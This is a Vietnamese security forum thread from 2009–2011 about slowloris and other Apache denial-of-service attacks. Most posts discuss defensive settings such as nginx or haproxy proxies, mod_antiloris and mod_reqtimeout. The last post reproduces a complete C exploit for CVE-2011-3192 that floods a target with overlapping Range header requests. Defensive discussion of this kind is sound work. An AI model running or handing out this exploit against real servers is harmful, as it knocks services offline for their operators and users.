[Announcement] Apache HTTP DoS |
29/06/2009 17:53:38 (+0700) | #31 | 184936 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Announcement] Apache HTTP DoS |
29/06/2009 21:58:02 (+0700) | #32 | 184946 |
|
tranvanminh
HVA Friend
|
Joined: 04/06/2003 06:36:35
Messages: 516
Location: West coast
Offline
|
|
8668 wrote:
Đã làm theo cách của bác tranvanminh,cải thiện tốc độ chút ít!
Thật ra khi tui post bài đó lên , tui và lão Hoàng cũng đã thử điều chỉnh sao cho thằng nginx hiệu quả , ruốt cuộc đúc kết được mấy cái option này .
worker_processes 2
client_header_timeout 5;
ignore_invalid_headers on;
limit_zone gulag $binary_remote_addr 1m;
Nó hoạt động như thế nào thì bạn vào đọc tài liệu tại https://calomel.org/nginx.html .
Hôm qua, có bạn hỏi thăm tui, bây giờ server đang hoạt động nên không thể ráp thêm 1 con proxy vào và cũng không có tiền để mua server cho việc phòng hờ . Nhưng mà theo như kết quả test , thì mình chỉ cần cài đặt nginx vào server chung với apache vẫn có hiệu quả chống slowloris được như thường . Cách làm như tui đã post , chỉ cần cài đặt như bài trên thì cũng ngon lành rồi .
Còn có thật hay không thì các bạn tự làm thử đi rồi biết |
|
|
|
|
[Announcement] Apache HTTP DoS |
30/06/2009 03:31:19 (+0700) | #33 | 184979 |
8668
Member
|
0 |
|
|
Joined: 25/06/2008 18:30:36
Messages: 24
Offline
|
|
tranvanminh wrote:
8668 wrote:
Đã làm theo cách của bác tranvanminh,cải thiện tốc độ chút ít!
Thật ra khi tui post bài đó lên , tui và lão Hoàng cũng đã thử điều chỉnh sao cho thằng nginx hiệu quả , ruốt cuộc đúc kết được mấy cái option này .
worker_processes 2
client_header_timeout 5;
ignore_invalid_headers on;
limit_zone gulag $binary_remote_addr 1m;
Nó hoạt động như thế nào thì bạn vào đọc tài liệu tại https://calomel.org/nginx.html .
Hôm qua, có bạn hỏi thăm tui, bây giờ server đang hoạt động nên không thể ráp thêm 1 con proxy vào và cũng không có tiền để mua server cho việc phòng hờ . Nhưng mà theo như kết quả test , thì mình chỉ cần cài đặt nginx vào server chung với apache vẫn có hiệu quả chống slowloris được như thường . Cách làm như tui đã post , chỉ cần cài đặt như bài trên thì cũng ngon lành rồi .
Còn có thật hay không thì các bạn tự làm thử đi rồi biết
Cách đơn giản nhất để cài nginx làm proxy:
http://www.howtoforge.com/reduce-apache-load-with-nginx-rhel5.2
Tốt nhất là compile lại nginx vì gói rpm cũ qua rồi!
Cảm ơn bác tranvanminh đã đưa ra giải pháp khá thú vị! |
|
|
|
|
[Announcement] Apache HTTP DoS |
02/07/2009 05:37:22 (+0700) | #34 | 185127 |
|
sup3rmm
Member
|
0 |
|
|
Joined: 17/08/2006 22:14:28
Messages: 21
Offline
|
|
Các bác dùng thử thằng này http://haproxy.1wt.eu/, option timeout http-request, cái này chắc đúng ý bác male . Em apply thằng này cho hệ thống đến nay vẫn ổn |
|
|
|
|
[Announcement] Apache HTTP DoS |
16/07/2009 22:01:18 (+0700) | #35 | 186470 |
matrix
Member
|
0 |
|
|
Joined: 17/03/2004 21:56:18
Messages: 1
Offline
|
|
Giải pháp tạm thời trên máy đơn khi chưa có bản vá cho apache bạn thử install cái mod_antiloris thử xem.
Tham khảo link tôi gởi kèm:
ftp://ftp.monshouwer.eu/pub/linux/mod_antiloris/
|
|
|
|
|
[Announcement] Apache HTTP DoS |
07/05/2010 15:36:14 (+0700) | #36 | 210489 |
Loay hoay mãi vẩn chưa run được, đuối.....Có bác nào giúp e trải nghiệm với, vì em không rành về Perl. Thanks! |
|
|
|
|
[Announcement] Apache HTTP DoS |
10/05/2010 05:09:02 (+0700) | #37 | 210589 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
xxxxx.kenji.xxxxx wrote:
Loay hoay mãi vẩn chưa run được, đuối.....Có bác nào giúp e trải nghiệm với, vì em không rành về Perl. Thanks!
Bồ muốn "trải nghiệm" cái gì? Không rành về Perl thì học Perl, thực hành Perl. Sách về Perl có một tỉ cuốn trên mạng kìa. Những cái này không có ai có thể giúp được cả. |
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Announcement] Apache HTTP DoS |
10/05/2010 05:50:15 (+0700) | #38 | 210590 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
Phiên bản apache httpd 2.2.15 (trở đi) có thêm module mod_reqtimeout hiện đang ở tình trạng "experimental". Module này cho phép ấn định giá trị "timeout" của request. Có hai phần chính trong directive RequestReadTimeout đó là timeout cho "body" và timeout cho "header". Đối với slowloris, giá trị timeout cho "header" chính là biện pháp chống chọi với dạng DDoS được thảo luận ở trên. Nó tương tự với giá trị client_header_timeout của nginx. Tuy nhiên, xét về mặt kỹ thuật thì RequestReadTimeout của apache hay hơn client_header_timeout của nginx ở chỗ nó có thêm giá trị "MinRate" đi kèm. Giá tri "MinRate" này là một phương tiện để ấn định khả năng gia giảm giá trị "timeout" dynamically. Bởi vậy, nó uyển chuyển hơn client_header_timeout của nginx.
Ví dụ:
RequestReadTimeout header=5-10,MinRate=500
Dòng ấn định trên có nghĩa nôm na là một request đi vô sẽ được httpd apache chờ đợi thông tin của request header (chỉ header chớ không bao gồm luôn body) là 5 giây. Nếu phía client gởi data cho phần header thì cứ mỗi 500 bytes mà httpd apache nhận được, nó sẽ gia tăng timeout thêm 1 giây. Nhưng nếu sau 10 giây mà không có thêm thông tin gì cho header nữa thì apache httpd sẽ huỷ connection của client đó. Tính uyển chuyển nằm ở chỗ nếu phía client có thật sự gởi data thì gia tăng giá trị "timeout" để tạo điều kiện cho client ấy tiếp tục gởi. Tuy nhiên, apache vẫn ấn định thời gian tối đa để gởi một http header là 10 giây.
Trong tình trạng bị slowloris tấn công, RequestReadTimeout giúp triệt tiêu các connections mà slowloris tạo ra trong một khoảng thời gian được ấn định cụ thể thay vì bị tràn ngập hết "MaxClients" và hoàn toàn không thể tiếp tục phục vụ. |
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Announcement] Apache HTTP DoS |
11/05/2010 11:03:10 (+0700) | #39 | 210682 |
conmale wrote:
xxxxx.kenji.xxxxx wrote:
Loay hoay mãi vẩn chưa run được, đuối.....Có bác nào giúp e trải nghiệm với, vì em không rành về Perl. Thanks!
Bồ muốn "trải nghiệm" cái gì? Không rành về Perl thì học Perl, thực hành Perl. Sách về Perl có một tỉ cuốn trên mạng kìa. Những cái này không có ai có thể giúp được cả.
Đã run, thanks! |
|
|
|
|
[Announcement] Apache HTTP DoS |
24/07/2010 00:16:29 (+0700) | #40 | 216191 |
Monkey.D.Luffy
Member
|
0 |
|
|
Joined: 22/07/2009 10:18:18
Messages: 9
Location: @
Offline
|
|
Hi, giúp em vấn đề này với.
Em đã setup nginx và chạy thành công nhưng bị lỗi này.
File config em như sau:
-nginx listen ở port 80
-apache listen ở port 8000
-forum em chạy vbb
Em vẫn chạy forum được với path http://site/forum/index.php nhưng có những script ví dụ như login, newpost nó lại bị wwwect về http://site:8000/forum/xxx.php? thế là ko thể connect được, muốn connect thì phải bỏ :8000 ở path, em muốn hỏi là làm sao để khắc phục tình trạng này?
Thân.
|
|
|
|
|
[Announcement] Apache HTTP DoS |
24/07/2010 02:20:50 (+0700) | #41 | 216192 |
Monkey.D.Luffy
Member
|
0 |
|
|
Joined: 22/07/2009 10:18:18
Messages: 9
Location: @
Offline
|
|
Hê hê, em fix được rồi mấy pác |
|
|
|
|
[Announcement] Apache HTTP DoS |
24/07/2010 20:13:07 (+0700) | #42 | 216233 |
Monkey.D.Luffy
Member
|
0 |
|
|
Joined: 22/07/2009 10:18:18
Messages: 9
Location: @
Offline
|
|
Bây giờ thì em lại có vấn đề với cache.
Em đã config lưu cache thành công đối với file image,css,js nhưng đối với script thì nó vẫn lưu lại cache nên mỗi lần post bài thì phải F5 mới hiển thị được bài viết.
Làm sao ko cho script *.php ko lưu lại cache mấy anh? Em đang sử dụng nginx 7.x nên ko có option proxy_no_cache, giờ chẳng biết làm sao, ai help em với ạ
Thân. |
|
|
|
|
[Announcement] Apache HTTP DoS |
01/08/2010 20:02:08 (+0700) | #43 | 217196 |
huyannet
Member
|
0 |
|
|
Joined: 21/07/2008 00:42:51
Messages: 83
Offline
|
|
- Nếu xài chung 1 proxy thì thằng proxy sẽ lảnh đạn trước rồi mới tới mình,
Chắc chắn Proxy sẽ tự bảo vệ, điều đó cũng có nghĩa proxy là tấm đỡ cho mình 1 phần,
Đứa nào qua được proxy thì mình đập đầu từng đứa 1
- Còn nếu dùng proy cá nhân thì chỉ cần đập 1 cái chết liền đỡ mỏi tay hơn ở trên .
Em là nêu bai, lời em nói chỉ lai rai, có gì sai xin giả nai, đừng cho bái bai, kẻo em die. |
|
|
|
|
[Announcement] Apache HTTP DoS |
02/08/2010 10:08:11 (+0700) | #44 | 217256 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Announcement] Apache HTTP DoS |
07/11/2010 08:34:22 (+0700) | #45 | 224401 |
LlyKil
Member
|
0 |
|
|
Joined: 22/01/2008 18:33:58
Messages: 16
Offline
|
|
Monkey.D.Luffy wrote:
Hi, giúp em vấn đề này với.
Em đã setup nginx và chạy thành công nhưng bị lỗi này.
File config em như sau:
-nginx listen ở port 80
-apache listen ở port 8000
-forum em chạy vbb
Em vẫn chạy forum được với path http://site/forum/index.php nhưng có những script ví dụ như login, newpost nó lại bị wwwect về http://site:8000/forum/xxx.php? thế là ko thể connect được, muốn connect thì phải bỏ :8000 ở path, em muốn hỏi là làm sao để khắc phục tình trạng này?
Thân.
Bạn có thể giải thích rõ chổ này giúp mình được không? |
|
|
|
|
[Announcement] Apache HTTP DoS |
26/11/2010 17:48:13 (+0700) | #46 | 225592 |
lequi
Member
|
0 |
|
|
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
|
|
Monkey.D.Luffy wrote:
Bây giờ thì em lại có vấn đề với cache.
Em đã config lưu cache thành công đối với file image,css,js nhưng đối với script thì nó vẫn lưu lại cache nên mỗi lần post bài thì phải F5 mới hiển thị được bài viết.
Làm sao ko cho script *.php ko lưu lại cache mấy anh? Em đang sử dụng nginx 7.x nên ko có option proxy_no_cache, giờ chẳng biết làm sao, ai help em với ạ
Thân.
Bạn gửi nội dung file nginx config lên đây thì mọi người mới có thể giúp được |
|
|
|
|
[Announcement] Apache HTTP DoS |
21/12/2010 08:36:29 (+0700) | #47 | 227508 |
|
theghoststone
Member
|
0 |
|
|
Joined: 26/05/2010 04:32:15
Messages: 5
Location: Trà Vinh
Offline
|
|
Quyết liệt quá, nhìn mà ghiền, ước gì mình hiểu tất cả, chỉ hiểu 30% |
|
Xác Định Chính Xác Những Gì Mình Cần Làm Là Tối Quan Trọng Nhất |
|
|
|
[Announcement] Apache HTTP DoS |
21/09/2011 18:58:28 (+0700) | #48 | 247539 |
|
chiro8x
Member
|
0 |
|
|
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
|
|
=.=! Cái này có gì hot ! nếu thiết lập request timeout hợp lý là ổn rồi. Ai biểu keep-alive làm chi. |
|
while(1){} |
|
|
|
[Announcement] Apache HTTP DoS |
21/09/2011 19:01:25 (+0700) | #49 | 247540 |
|
chiro8x
Member
|
0 |
|
|
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
|
|
conmale wrote:
Phiên bản apache httpd 2.2.15 (trở đi) có thêm module mod_reqtimeout hiện đang ở tình trạng "experimental". Module này cho phép ấn định giá trị "timeout" của request. Có hai phần chính trong directive RequestReadTimeout đó là timeout cho "body" và timeout cho "header". Đối với slowloris, giá trị timeout cho "header" chính là biện pháp chống chọi với dạng DDoS được thảo luận ở trên. Nó tương tự với giá trị client_header_timeout của nginx. Tuy nhiên, xét về mặt kỹ thuật thì RequestReadTimeout của apache hay hơn client_header_timeout của nginx ở chỗ nó có thêm giá trị "MinRate" đi kèm. Giá tri "MinRate" này là một phương tiện để ấn định khả năng gia giảm giá trị "timeout" dynamically. Bởi vậy, nó uyển chuyển hơn client_header_timeout của nginx.
Ví dụ:
RequestReadTimeout header=5-10,MinRate=500
Dòng ấn định trên có nghĩa nôm na là một request đi vô sẽ được httpd apache chờ đợi thông tin của request header (chỉ header chớ không bao gồm luôn body) là 5 giây. Nếu phía client gởi data cho phần header thì cứ mỗi 500 bytes mà httpd apache nhận được, nó sẽ gia tăng timeout thêm 1 giây. Nhưng nếu sau 10 giây mà không có thêm thông tin gì cho header nữa thì apache httpd sẽ huỷ connection của client đó. Tính uyển chuyển nằm ở chỗ nếu phía client có thật sự gởi data thì gia tăng giá trị "timeout" để tạo điều kiện cho client ấy tiếp tục gởi. Tuy nhiên, apache vẫn ấn định thời gian tối đa để gởi một http header là 10 giây.
Trong tình trạng bị slowloris tấn công, RequestReadTimeout giúp triệt tiêu các connections mà slowloris tạo ra trong một khoảng thời gian được ấn định cụ thể thay vì bị tràn ngập hết "MaxClients" và hoàn toàn không thể tiếp tục phục vụ.
Bài của anh conmale quá chuẩn luôn . Lúc nãy em đọc không kĩ. Thực ra slowris không có gì quá ghê gớm cả. Slowris lợi dụng việc Apache nhầm lẫn giữa \r\n\r\n và \r\n khiến cho nó không thể kết thúc truy vấn được. |
|
while(1){} |
|
|
|
[Announcement] Apache HTTP DoS |
10/12/2011 21:13:24 (+0700) | #50 | 250961 |
tuyenhva
Member
|
0 |
|
|
Joined: 12/07/2010 20:43:58
Messages: 8
Offline
|
|
1 code dos vào Apache mới trên exploit-db.com
Code:
/*
* This is a reverse engineered version of the exploit for CVE-2011-3192 made
* by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
* Copyright 2011 Ramon de C Valle <rcvalle@redhat.com>
*
* Compile with the following command:
* gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <pthread.h>
void ptrace_trap(void) __attribute__ ((constructor));
void
ptrace_trap(void) {
if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
write(fileno(stdout), "Segmentation fault\n", 19);
exit(-1);
}
}
void
w4rn41dun14mu(int attr, int fg, int bg)
{
char command[13];
sprintf(command, "%c[%d;%d;%dm", 0x1b, attr, fg+30, bg+40);
printf("%s", command);
}
void
banner()
{
w4rn41dun14mu(0, 1, 0);
fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\n", 53, 1,
stdout);
}
void
gime_er_mas()
{
printf("%c%s", 0x1b, "[2J");
printf("%c%s", 0x1b, "[1;1H");
puts("\nsorry dude there's an error...");
}
struct thread_info {
pthread_t thread_id;
int thread_num;
char *argv_string;
};
static void *
thread_start(void *arg)
{
struct thread_info *tinfo = (struct thread_info *) arg;
char hostname[64];
int j;
strcpy(hostname, tinfo->argv_string);
j = 0;
while (j != 10) {
struct addrinfo hints;
struct addrinfo *result, *rp;
int sfd, s;
ssize_t nwritten;
memset(&hints, 0, sizeof(struct addrinfo));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = 0;
hints.ai_protocol = 0;
s = getaddrinfo(hostname, "http", &hints, &result);
if (s != 0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s));
exit(EXIT_FAILURE);
}
for (rp = result; rp != NULL; rp = rp->ai_next) {
sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
if (sfd == -1)
continue;
if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1)
close(sfd);
}
if (result != NULL)
freeaddrinfo(result);
nwritten = write(sfd, "HEAD / HTTP/1.1\n"
"Host:localhost\n"
"Range:bytes=0-,0-\n"
"Accept-Encoding: gzip", 71);
if (nwritten == -1)
close(sfd);
usleep(300000);
j++;
}
return 0;
}
int
main(int argc, char *argv[])
{
int i;
struct thread_info tinfo;
banner();
if (argc <= 1) {
w4rn41dun14mu(0, 2, 0);
fwrite("\n[-] Usage : ./rapache hostname\n", 32, 1, stdout);
return 0;
}
w4rn41dun14mu(0, 3, 0);
printf("[+] Attacking %s please wait in minutes ...\n", argv[1]);
while (1) {
i = 0;
while (i != 50) {
tinfo.thread_num = i;
tinfo.argv_string = argv[1];
pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo);
usleep(500000);
i++;
}
}
}
http://www.exploit-db.com/exploits/18225/ |
|
|
|
|
|
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|